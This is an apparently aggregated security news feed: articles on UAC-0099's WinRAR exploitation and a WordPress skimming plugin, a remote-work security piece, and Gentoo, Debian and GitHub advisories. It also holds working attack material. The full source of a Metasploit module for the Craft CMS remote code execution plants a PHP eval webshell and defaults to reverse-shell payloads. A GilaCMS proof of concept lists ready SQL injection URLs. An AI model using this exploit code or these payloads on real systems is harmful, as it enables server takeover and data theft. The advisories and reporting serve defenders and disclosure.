By Waqas
UAC-0099 is a pro-Russian hacking group that has been targeting Ukraine since the conflict between the two countries began.
This is a post from HackRead.com Read the original post: UAC-0099 Hackers Using Old WinRAR Flaw in New Cyberattack on Ukraine

The exploited WinRAR vulnerability was a zero-day flaw identified in August 2023 – Despite subsequent patching efforts, unpatched systems remain at risk and continue to be targeted.

Cybersecurity researchers at Deep Instinct Lab have revealed a new series of cyberattacks carried out by ‘UAC-0099,’ specifically targeting Ukrainians. These attacks employ common tactics such as using fabricated court summons to entice targets into executing **malicious files**.

The group’s activities were initially revealed in May 2023 through the Ukrainian CERT advisory ‘#6710,’ and Deep Instinct has now provided exclusive insights into their latest attack.

According to a **blog post** from the company, on December 21st, 2023, ‘UAC-0099’ utilized an email scam to impersonate the Lviv city court via the ukr.net email service. The target was a Ukrainian employee working remotely for a company outside Ukraine. The deceptive email contained an executable file created by WinRAR, named docx.lnk.

Although appearing as a regular document, it was an **LNK shortcut** designed to execute PowerShell with malicious content, decoding two base64 blobs and writing the output into VBS and DOCX files.

The VBS malware, identified as ‘LonePage’ by CERT-UA, establishes a concealed PowerShell process that communicates with a predefined C2 URL to retrieve a text file. The script verifies the presence of the string ‘get-content’ in the text file, subsequently executing the code from the server and saving it as an array of bytes.

The LonePage VBS (VBS) proves to be a potent tool, enabling cybercriminals to infiltrate computers and execute malicious code. Employing a deceptive tactic, it utilizes a DOCX decoy document, tricking victims into believing they are opening a legitimate file. Employing a method akin to the LNK attack vector, the HTA technique involves an HTML file incorporating a VBScript that executes PowerShell with a recurring four-minute task cadence.

In both incidents, the pro-Russian gang exploited a recognized **WinRAR vulnerability**, designated as **CVE-2023-38831** in August 2023, and identified by Group-IB. This vulnerability arises from the way WinRAR processes ZIP files, requiring user interaction with a specially crafted ZIP archive for exploitation.

The attacker crafts a seemingly harmless archive by appending a space after the file extension. This archive contains a folder with an identical name and an extra file bearing a “.cmd” extension.

When a user double-clicks on the innocuous file, the associated “cmd” file is executed instead. This vulnerability heightens the risk of widespread infections, as even security-aware victims may inadvertently run malicious code while opening what appears to be a harmless file.

Researchers have found this gang’s tactics simple yet effective. They rely on PowerShell and create a scheduled task to execute a VBS file. Monitoring/restricting these components can reduce the risk of “UAC-0099” attacks and help identify them quickly in case of compromise.

The attack flow (Deep Instinct Lab)

This isn’t the first time Russian hackers have exploited known vulnerabilities. In early December, Hackread.com **reported** how the Russian GRU’s affiliated Forest Blizzard exploited an Outlook vulnerability allowing attackers to steal Net-NTLMv2 hashes and access user accounts.

On December 15, 2023, **reports surfaced** that Russian hackers breached a major US biomedical company in a TeamCity-linked attack. Despite the vulnerability, which scored 9.8 on the CVSS scale, being **patched in September 2023**, unpatched systems remain susceptible to ongoing cyberattacks.

****_RELATED ARTICLES_****

1.  **Russian Midnight Blizzard Hackers Hit MS Teams in Precision Attack**
2.  **Russian Hackers Employ Telekopye Toolkit in Broad Phishing Attacks**
3.  **Microsoft warns of rising NOBELIUM credential attacks on defence sector**
4.  **Microsoft Outlook Vulnerability Exploited by Russian Forest Blizzard Group**
5.  **Russia Hackers Abusing BRc4 Red Team Penetration Tool in Recent Attacks**

UAC-0099 Hackers Using Old WinRAR Flaw in New Cyberattack on Ukraine

WSO2 Registry has been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console.


**WSO2 Registry Stored Cross Site Scripting (XSS) vulnerability**

Moderate severity GitHub Reviewed Published Dec 22, 2023 to the GitHub Advisory Database • Updated Dec 22, 2023

GHSA-rfq3-wpjh-ppvg: WSO2 Registry Stored Cross Site Scripting (XSS) vulnerability

Threat hunters have discovered a rogue WordPress plugin that's capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information.
The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.
"As with many other malicious or fake WordPress plugins it contains some deceptive information at

Threat hunters have discovered a rogue WordPress plugin that's capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information.

The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.

"As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy," security researcher Ben Martin said. "In this case, comments claim the code to be 'WordPress Cache Addons.'"

Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site.

Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it's automatically enabled and conceals its presence from the admin panel.

UPCOMING WEBINAR

Beat AI-Powered Threats with Zero Trust - Webinar for Security Professionals

Traditional security measures won't cut it in today's world. It's time for Zero Trust Security. Secure your data like never before.

Join Now

"Since the only way to remove any of the mu-plugins is by manually removing the file the malware goes out of its way to prevent this," Martin explained. "The malware accomplishes this by unregistering callback functions for hooks that plugins like this normally use."

The fraudulent also comes with an option to create and hide an administrator user account from the legitimate website admin to avoid raising red flags and have sustained access to the target for extended periods of time.

The ultimate objective of the campaign is to inject credit card stealing malware in the checkout pages and exfiltrate the information to an actor-controlled domain.

"Since many WordPress infections occur from compromised wp-admin administrator users it only stands to reason that they've needed to work within the constraints of the access levels that they have, and installing plugins is certainly one of the key abilities that WordPress admins possess," Martin said.

The disclosure arrives weeks after the WordPress security community warned of a phishing campaign that warns users of an unrelated security flaw and tricks them into installing a plugin under the guise of a patch. The plugin, for its part, creates an admin user and deploys a web shell for persistent remote access.

Sucuri said that the threat actors behind the campaign are leveraging the "RESERVED" status associated with a CVE identifier, which happens when it has been reserved for use by a CVE Numbering Authority (CNA) or security researcher, but the details are yet to be filled.

It also comes as the website security firm discovered another Magecart campaign that uses the WebSocket communications protocol to insert the skimmer code on online storefronts. The malware then gets triggered upon clicking a fake "Complete Order" button that's overlaid on top of the legitimate checkout button.

Europol's spotlight report on online fraud released this week described digital skimming as a persistent threat that results in the theft, re-sale, and misuse of credit card data. "A major evolution in digital skimming is the shift from the use of front-end malware to back-end malware, making it more difficult to detect," it said.

The E.U. law enforcement agency said it also notified 443 online merchants that their customers' credit card or payment card data had been compromised via skimming attacks.

Group-IB, which also partnered with Europol on the cross-border cybercrime fighting operation codenamed Digital Skimming Action, said it detected and identified 23 families of JS-sniffers, including ATMZOW, health\_check, FirstKiss, FakeGA, AngryBeaver, Inter, and R3nin, which were used against companies in 17 different countries across Europe and the Americas.

"In total, 132 JS-sniffer families are known, as of the end of 2023, to have compromised websites worldwide," the Singapore-headquartered firm added.

That's not all. Bogus ads on Google Search and Twitter for cryptocurrency platforms have been found to promote a cryptocurrency drainer named MS Drainer that's estimated to have already plundered $58.98 million from 63,210 victims since March 2023 via a network of 10,072 phishing websites.

"By targeting specific audiences through Google search terms and the following base of X, they can select specific targets and launch continuous phishing campaigns at a very low cost," ScamSniffer said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft

By Waqas
Work from home or WFH is a blessing for employees, but it can be a disguise when it comes to data security. Protecting yourself and your work infrastructure at home from cyberattacks is crucial.
This is a post from HackRead.com Read the original post: Top Data Security Issues of Remote Work

The surge in remote work has brought about intense concerns regarding data security including unsecured home networks and the increased use of personal devices pose significant challenges.

You’re living in an era where traditional office spaces are rapidly becoming a thing of the past. The advent of technology and the internet has brought about a paradigm shift in the way you work. This shift, however, has also ushered in new challenges, especially concerning data security. Data is the lifeblood of modern businesses, and its security should be a top priority.

The shift to remote work has only increased the need for robust data security measures. With employees accessing confidential information from a variety of locations and devices, the risk of data breaches has never been higher. Therefore, it’s important to understand these risks and implement effective measures to mitigate them.

In this article, you’ll explore the top data security issues of remote work and how to manage them effectively. Let’s begin.

****The Growth of Remote Work****

While the return-to-office initiative is on the rise, many organizations still allow remote or hybrid work arrangements. In 2023 alone, 28.2% of full-time employees use a hybrid approach, while 12.7% work from home. The flexibility offered by remote work is a big draw for many employees, and businesses are finding that it can also lead to increased productivity and cost savings.

However, as the number of remote workers increases, so does the risk of data security issues. Working from home often means using less secure home networks and personal devices, which can be a goldmine for cybercriminals. Furthermore, the lack of direct supervision makes enforcing corporate policies and regulatory requirements harder.

****Top Remote Work Data Security Issues****

One of remote work’s most significant data security issues is the risk of data breaches. In a traditional office setting, physical security measures can prevent unauthorized access to sensitive data. However, in a remote work setting, these measures are often absent. Moreover, the increased use of cloud services for collaboration and data storage also presents additional risks.

Another major issue is the vulnerability of home networks, which frequently lack the security measures found in corporate environments. Home networks, unlike corporate networks, frequently lack strict firewalls and antivirus software, making them a prime target. Cybercriminals can easily exploit these security flaws, putting personal information and data at risk. As a result, strengthening home network security is critical.

Other security issues to keep in mind include:

*   **Use of Personal Devices**: Remote employees frequently use personal devices for work, which can jeopardize data security. These devices may lack the same level of security as company-supplied equipment, making them more vulnerable to cyber threats and data breaches.
*   **Enforcing Corporate Policies and Regulatory Requirements** – Enforcing corporate policies and regulatory requirements is another major challenge with remote work. Ensuring compliance with data security policies can be difficult without the physical presence of supervisors and IT staff.
*   **Increased Risk of Phishing, Malware, and Social Engineering** – Remote workers are also more susceptible to phishing, malware, and social engineering attacks. These attacks often exploit human error and can lead to significant data breaches. Therefore, educating remote workers about these threats and how to avoid them is essential.
*   **Inadequate Secure Wi-Fi Networks**: Remote workers typically connect to corporate networks through unsecured or public Wi-Fi networks, which poses a significant security risk. Cybercriminals can easily exploit these networks by intercepting data transmission or injecting malware, potentially resulting in data breaches or system compromises. 

****Managing the Data Security Issues of Remote Work****

Regardless of these challenges, there are ways to effectively manage the data security issues associated with remote work. Implementing a data protection platform and zero-trust security controls are two of the most effective solutions.

A data protection platform is an essential component of today’s cybersecurity strategies. It offers a comprehensive solution for safeguarding sensitive data while meticulously monitoring and controlling data access. Its sophisticated mechanisms ensure that only authorized individuals have access to sensitive data, preserving data integrity and confidentiality. This platform is vital for preventing data breaches, improving regulatory compliance, and providing businesses with a secure digital environment.

Zero-trust security controls, on the other hand, are founded on a fundamental principle: by default, trust no user or device. Because of this, each access request is thoroughly verified before it can be approved. It is not a case of being overly suspicious, but of being proactive in terms of security. By scrutinizing every request, these controls significantly reduce the likelihood of data breaches. This method is extremely effective in preventing unauthorized access while also maintaining the integrity and confidentiality of sensitive data.

Other benefits of using data security tools for remote work include:

*   **Improved Visibility and Control:** Data security tools provide real-time visibility into all data movement, allowing businesses to monitor and control data access effectively.
*   **Improved Compliance:** These tools help to meet regulatory requirements by ensuring that data is handled and stored in a compliant manner, lowering the risk of penalties.
*   **Data Loss Risk is Reduced:** Data protection tools include features like automatic backups and encryption, which reduce the risk of data loss due to accidents or cyber-attacks.
*   **Advanced Threat Detection:** Some tools use artificial intelligence and machine learning to detect suspicious activity or anomalies, preventing potential breaches.
*   **Increased Productivity:** In a secure environment, employees can focus on their work without being concerned about potential data breaches, resulting in increased productivity.
*   **Improved Remote Work Security**: Data security tools include features like secure VPNs and multi-factor authentication, significantly enhancing network security by making it more difficult for unauthorized individuals to access sensitive information.
*   **Cost-Effective**: Implementing these tools can lead to long-term cost savings by preventing costly data breaches and reducing the time and resources spent on recovery after a breach.

Ultimately, remote work presents distinct data security challenges. These challenges, however, can be effectively managed with the right strategies and tools. A solid data protection platform that provides a secure foundation for your digital assets is extremely important.

Coupled with zero-trust security controls, you can ensure solid safeguards for your valuable data. These safeguards are essential to maintaining business continuity, especially in this day and age when remote work is becoming more common. With careful planning and implementation, you can weather the storm of data security threats in a remote work scenario.

****_RELATED ARTICLES_****

1.  **Top 3 data security risks facing businesses**
2.  **Data Security: Key Steps When Transferring Your Digital Workspace**
3.  **Data Security Threats to Businesses: Strategies to Strengthen Defense**
4.  **Nexo Achieves Type 2 SOC 2 Audit, Reinforces Data Security Compliance**
5.  **How cloud data distracts businesses from correct data security practices**

Top Data Security Issues of Remote Work

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Craft CMS versions 4.0.0-RC1 through 4.4.14.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Craft CMS unauthenticated Remote Code Execution (RCE)',        'Description' => %q{          This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular          content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are  affected by this vulnerability          allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity          of the application.          The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class          which allows to run arbitrary PHP code by escalating the object creation calling some methods available in          `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which          stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that          facilitates the reading of images, performance of image processing tasks, and writing of results back          to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the          Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the          malicious PHP code and gaining access to the system.          Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain          access to the underlying operating system as the user that the web services are running as (typically www-data).        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Thanh', # discovery          'chybeta' # poc        ],        'References' => [          [ 'CVE', '2023-41892' ],          [ 'URL', 'https://blog.calif.io/p/craftcms-rce' ],          [ 'URL', 'https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/' ],          [ 'URL', 'https://github.com/advisories/GHSA-4w8r-3xrw-v25g' ],          [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892' ],        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix', 'linux', 'php' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => [ 'unix', 'linux' ],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ ARCH_X64, ARCH_X86 ],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-09-13',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'Craft CMS base url', '/' ]),        OptString.new('WEBSHELL', [          false, 'The name of the webshell with extension .php. Webshell name will be randomly generated if left unset.', ''        ]),        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])      ]    )  end  def check_phpinfo    # checks vulnerability running phpinfo() and returns upload_tmp_dir and DOCUMENT_ROOT    @config = { 'upload_tmp_dir' => nil, 'document_root' => nil }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI']),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'action' => 'conditions/render',        'configObject[class]' => 'craft\elements\conditions\ElementCondition',        'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'      }    })    if res && res.body      # parse HTML to find the upload directory and the document root provided by phpinfo command output      html = res.get_html_document      unless html.blank?        tr_items = html.css('tr td')        tr_items.each_with_index do |item, i|          next if tr_items[i + 1].nil?          if item.text.casecmp?('upload_tmp_dir')            if tr_items[i + 1].text.casecmp?('no value')              @config['upload_tmp_dir'] = '/tmp'            else              @config['upload_tmp_dir'] = tr_items[i + 1].text.strip            end          end          @config['document_root'] = tr_items[i + 1].text.strip if item.text.casecmp?('$_SERVER[\'DOCUMENT_ROOT\']')        end      end    end  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    if datastore['WEBSHELL'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"    else      @webshell_name = datastore['WEBSHELL'].to_s    end    # select webshell depending on the target setting (PHP or others).    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    if target['Type'] == :php      # create the MSL payload      # payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"      payload = <<~EOS        <?xml version="1.0" encoding="UTF-8"?>        <image>        <read filename="caption:<?php @eval(base64_decode($_POST[\'#{@post_param}\'])); ?>" />        <write filename="info:#{@config['document_root']}/#{@webshell_name}" />        </image>      EOS    else      # create the MSL payload      # payload = "<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\']));?>"      payload = <<~EOS        <?xml version="1.0" encoding="UTF-8"?>        <image>        <read filename="caption:<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\'])); ?>" />        <write filename="info:#{@config['document_root']}/#{@webshell_name}" />        </image>      EOS    end    # construct multipart form data with Imagick MSL payload    form_data = Rex::MIME::Message.new    form_data.add_part('conditions/render', nil, nil, 'form-data; name="action"')    form_data.add_part('craft\elements\conditions\ElementCondition', nil, nil, 'form-data; name="configObject[class]"')    form_data.add_part('{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}', nil, nil, 'form-data; name="config"')    form_data.add_part(payload, 'text/plain', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4..8)}\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.msl\"")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI']),      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })    if res && res.code == 502      # code 502 indicates a successful upload of the MSL payload in upload_tmp_dir (default /tmp unless specified in php.ini)      # next step is to generate the webshell in DOCUMENT_ROOT by executing the Imagick MSL payload      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI']),        'ctype' => 'application/x-www-form-urlencoded',        'vars_post' => {          'action' => 'conditions/render',          'configObject[class]' => 'craft\elements\conditions\ElementCondition',          'config' => "{\"name\":\"configObject\",\"as \":{\"class\":\"Imagick\", \"__construct()\":{\"files\":\"vid:msl:#{@config['upload_tmp_dir']}/php*\"}}}"        }      })      # code 502 indicates a successful generation of the webshell in DOCUMENT_ROOT      return res&.code == 502    end    false  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def on_new_session(session)    # cleanup webshell in DOCUMENT_ROOT    register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")    # Imagick plugin generates a php<random chars> file with MSL code in the directory set by    # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.    # A manual cleanup procedure is required to identify and remove the php* files when the session is established.    if session.type == 'meterpreter'      session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)      clean_files = session.fs.dir.entries    else      clean_files = session.shell_command_token("cd #{@config['upload_tmp_dir']};ls php*").split(' ')    end    unless clean_files.blank?      clean_files.each do |f|        register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/^php+/)      end    end    super  end  def check    check_phpinfo    return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?    CheckCode::Safe  end  def exploit    # check if upload_tmp_dir and document_root is already initialized with AutoCheck set otherwise run check_phpinfo    check_phpinfo unless datastore['AutoCheck']    fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?    fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php, :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(linemax: 65536)    end  endend

Craft CMS 4.4.14 Remote Code Execution

GilaCMS versions 1.15.4 and below suffer from multiple remote SQL injection vulnerabilities.

    Description: GilaCMS <=1.15.4 - Mutiple SQL injection vulnerabiltiesAffected CMS: GilaCMSAffected Version: <= 1.15.4CVE ID: CVE-2020-26623, CVE-2020-26624, CVE-2020-26625CVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HDiscoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.LtdMultiple SQL injection vulnerabilities were discovered in Gila CMS 1.15.4 and before which allows a remote attacker to execute arbitary web scripts.Proof of Concept:Attack Vector 1:After login into admin portal, go to administration>widget and use wiget area filter to perform searchSample payload:http://targeturl/cm/list_rows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20Attack Vector 2:After login into admin portal, go to edit post/page/role/user/category/userpostSample payload:http://targeturl/cm/edit_form/userrole?id=2'%20and%201%3d0%20UNION%20ALL%20SELECT%20@@version,NULL,NULL--%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/user?id=1'%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20http://targeturl/cm/edit_form/page?id=7'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL--%20http://targeturl/cm/edit_form/post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/postcategory?id=11'%20%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,NULL,@@version--%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/user-post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&callback=g_form_popup_updateAttacker Vector 3:After login into admin portal, go to Content>Posts and use Users filter to perform searchSample payload:http://targeturl/cm/list_rows/post?page=1&user_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,@@version,NULL--%20RecommendationUpdate to v2.0.1http://gilacms.comhttps://github.com/GilaCMS/gilahttps://github.com/GilaCMS/gila/security/policy

GilaCMS 1.15.4 SQL Injection

Gentoo Linux Security Advisory 202312-8 - A vulnerability has been found in LibRaw where a heap buffer overflow may lead to an application crash. Versions greater than or equal to 0.21.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: LibRaw: Heap Buffer Overflow  
     Date: December 22, 2023  
     Bugs: #908041  
       ID: 202312-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in LibRaw where a heap buffer overflow  
may lead to an application crash.

Background  
=========  
LibRaw is a library for reading RAW files obtained from digital photo  
cameras.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-libs/libraw  < 0.21.1-r1   >= 0.21.1-r1

Description  
==========  
A vulnerability has been discovered in LibRaw. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
A heap-buffer-overflow in raw2image_ex() caused by a maliciously crafted  
file may lead to an application crash.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All LibRaw users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libraw-0.21.1-r1"

References  
=========  
[ 1 ] CVE-2023-1729  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1729

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-08

Debian Linux Security Advisory 5586-1 - Several vulnerabilities have been discovered in OpenSSH, an implementation of the SSH protocol suite.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5586-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 22, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openssh  
CVE ID         : CVE-2021-41617 CVE-2023-28531 CVE-2023-48795 CVE-2023-51384  
                 CVE-2023-51385  
Debian Bug     : 995130 1033166

Several vulnerabilities have been discovered in OpenSSH, an  
implementation of the SSH protocol suite.

CVE-2021-41617

    It was discovered that sshd failed to correctly initialise  
    supplemental groups when executing an AuthorizedKeysCommand or  
    AuthorizedPrincipalsCommand, where a AuthorizedKeysCommandUser or  
    AuthorizedPrincipalsCommandUser directive has been set to run the  
    command as a different user. Instead these commands would inherit  
    the groups that sshd was started with.

CVE-2023-28531

    Luci Stanescu reported that a error prevented constraints being  
    communicated to the ssh-agent when adding smartcard keys to the  
    agent with per-hop destination constraints, resulting in keys being  
    added without constraints.

CVE-2023-48795

    Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that  
    the SSH protocol is prone to a prefix truncation attack, known as  
    the "Terrapin attack". This attack allows a MITM attacker to effect  
    a limited break of the integrity of the early encrypted SSH  
    transport protocol by sending extra messages prior to the  
    commencement of encryption, and deleting an equal number of  
    consecutive messages immediately after encryption starts.

    Details can be found at https://terrapin-attack.com/

CVE-2023-51384

    It was discovered that when PKCS#11-hosted private keys were  
    added while specifying destination constraints, if the PKCS#11  
    token returned multiple keys then only the first key had the  
    constraints applied.

CVE-2023-51385

    It was discovered that if an invalid user or hostname that contained  
    shell metacharacters was passed to ssh, and a ProxyCommand,  
    LocalCommand directive or "match exec" predicate referenced the user  
    or hostname via expansion tokens, then an attacker who could supply  
    arbitrary user/hostnames to ssh could potentially perform command  
    injection. The situation could arise in case of git repositories  
    with submodules, where the repository could contain a submodule with  
    shell characters in its user or hostname.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:8.4p1-5+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:9.2p1-2+deb12u2.

We recommend that you upgrade your openssh packages.

For the detailed security status of openssh please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/openssh

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWFTwlfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0S6PRAAkBJzc/CFQgXLtms7bom/Vw750vvqEVhj7ojOPHbmpoppVIjFR768C5Z6  
AO5HiP/uH1tk0x2zejbPhXRgLK/2PEuCTA/4w7UeTzYIGve3IVKVgNs+/sgWQBuK  
M1xj8zL1PLkRi6rSXAvGpTxqdCtWC61AWHOl1Q03w3usilETJKDsulOBb9sQ9Uid  
xSRxDUAS//gyRdW+K3D9HsPYJAW/oSu4tJO+UXI1WJTDY1N/i0cq7yH16YXzbEcV  
dhttLyR5fWx000fSsaaWXgYUS2sSYUfOKPfw4xdePpdeBYNumnpehjfCED5C61EQ  
os4uvEDi15X8M599/+u0oLVJJFXVSfZ4W1ecFWcFAvMny70F0s1a7AxQCcN3sXkt  
kLAuOXJHmmhBeqSj1kVKoLcg4WSlCdglRr6KgiXqUVvfUBsWhseoyGJ3jST3PQcZ  
70/lIJofavLJdFQHlPTXs7lDnFttgzuB3xE5wM7TeXs5L2l9QI0W64YCtWthqApL  
c7KjPGmAx7xYOOp+aHclsP74nBVZs6tcvHPf9Y/1OK30XkoMbuW0+oH1rCu6EGs0  
F6Th1FneTwRN2NEhzpQMr+34m0T8H7oymiQmi9C+ZDhCBDRcpN4sATYNh70Y/t6y  
i8k/vZcCCfLxQgdiay5JJCWJPf1pvvmPbgMLs4WVELr/6E9xIR0=2W//  
-----END PGP SIGNATURE-----

Debian Security Advisory 5586-1

By Deeba Ahmed
From Teen Prodigy to Cybercriminal: The Fall of a Lapsus$ Gang Member and the Dangers of the Online Underworld.
This is a post from HackRead.com Read the original post: GTA 6 Hacker from Lapsus$ Gang Sentenced to Hospital

